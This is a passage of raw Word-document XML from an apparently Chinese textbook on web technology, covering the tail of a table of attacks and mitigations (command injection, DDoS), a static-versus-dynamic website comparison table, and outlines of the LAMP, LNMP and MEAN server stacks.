            <w:tcW w:w="1193" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="106AE29B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命令注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6F841D5C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通过输入执行系统命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3A675672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输入过滤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/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最小权限原则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="1211F619" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="366164AA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DDoS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攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="515FA6D9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海量请求耗尽服务器资源</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5D90AB8C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WAF/CDN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清洗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/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流量限速</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="561AE78F" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="613247EB" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>静态网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>动态网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDDC95" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>静态网站</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>动态网站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10"/>
        <w:gridCol w:w="3410"/>
        <w:gridCol w:w="3324"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="461305A1" w14:textId="77777777" w:rsidTr="00501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60434A5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特性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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A6462B9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静态网站</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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82C49AC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动态网站</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="32164F60" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="62CBC987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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>内容生成</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3EFF2A4B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rFonts w:cs="Times New Roman"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预先生成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HTML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文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5E064873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实时生成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HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="6CEE9124" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1CEFE96C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rFonts w:cs="Times New Roman"/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技术栈</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3ADA9C04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rFonts w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>HTML/CSS/JS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6FA01FBD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 xml:space="preserve">PHP/Python/Ruby + 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数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="3C39FCEB" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1742F91B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服务器负载</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7F5B515A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低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(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仅文件传输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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D4CF403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高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(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需执行计算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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="2824AE3F" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="17A89785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典型场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="39C97C1E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企业官网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/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博客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/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文档</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="01AB6A96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电商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/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社交平台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/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管理系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="0A12631E" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="223D71BF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更新方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2A41621D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修改文件重新上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="295DAF14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后台管理系统更新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="405B5955" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7E7128FF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CDN</w:t>
            </w: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支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="563EBA31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完美支持</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3F79D7DF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仅静态资源可缓存</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="06151493" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0B7EEB1F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代表技术</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1928" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1F0EC48D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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Hugo/Jekyll/Gatsby</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1879" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="14972938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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>WordPress/Django/Spring Boot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71C30CF6" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D53718" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>主流</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>服务架构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF8C21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 xml:space="preserve">1. LAMP </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>架构（经典</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>方案）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719FA3DA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76F09733" wp14:editId="06E57EFC">
            <wp:extent cx="5615940" cy="1770380"/>
            <wp:effectExtent l="0" t="0" r="381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E88B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组件作用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AEEA32" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：操作系统基础</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B67DD" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>静态资源服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AC721B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：关系型数据存储</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A27A6F" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：动态内容生成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293FBB48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 xml:space="preserve">2. LNMP </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>架构（高性能方案）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D009386" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D453BFA" wp14:editId="541AA2A9">
            <wp:extent cx="5615940" cy="1506855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3167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性能优化点：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FC1F53" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：事件驱动架构，高并发处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A8400" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP-FPM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：进程管理器，资源隔离</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB6CD76" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Opcache</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码缓存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F5236C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 xml:space="preserve">3. MEAN </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>架构（全</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>方案）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585CD44E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
